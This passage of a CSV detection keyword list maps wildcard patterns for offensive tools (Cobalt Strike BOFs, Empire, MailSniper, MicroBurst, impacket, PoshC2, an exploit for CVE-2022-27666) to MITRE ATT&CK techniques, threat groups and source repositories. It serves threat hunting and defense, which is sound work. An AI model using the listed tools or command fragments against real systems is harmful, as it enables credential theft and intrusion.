TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*get_password_policy.x86.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*get_post_ex_pipename_list*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_post_ex_spawnto_x*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_process_inject_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_process_inject_bof_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_process_inject_execute*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_rooot.c*","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","41","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" +"*get_sharpurls*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_stage_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_stage_magic_mz_64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_stage_magic_mz_86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_stage_magic_pe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_virtual_Hook_address*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*Get_WinPwn_Repo.sh*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Get-AccessTokenWithPRT*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Get-AclModificationRights*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-ActiveTCPConnections*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Start-MonitorTCPConnections.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ADComputer * -Properties PrincipalsAllowedToDelegateToAccount*","offensive_tool_keyword","powershell","Command to get the list of accounts with PrincipalsAllowedToDelegateToAccount (used to exploit Bronze Bit Attack)","T1003 - T1057 - T1087 - T1482 - T1136","TA0001 - TA0002 - TA0005 - TA0006 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-ADUsernameFromEWS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*GetADUsers.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*getAggressorClient*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*getAllUserSpns*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" +"*Get-AppLockerPolicy -Effective *","greyware_tool_keyword","powershell","AppLocker Get AppLocker policy","T1592","TA0043","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-ASREPHash*","offensive_tool_keyword","AD exploitation cheat sheet","AS-REP roasting Get the hash for a roastable user using ASREPRoast.ps1","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-AzAutomationAccountCredsREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzDomainInfo*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzDomainInfoREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzKeyVaultKeysREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzKeyVaultSecretsREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzPasswords*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AZStorageKeysREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzureADDomainInfo*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzureADDomainInfo.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzurePasswords*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzUserAssignedIdentity*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-BaseLineResponseTimeEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Get-BeaconAPI*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" +"*GetBearerToken.exe https://*.sharepoint.com*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" 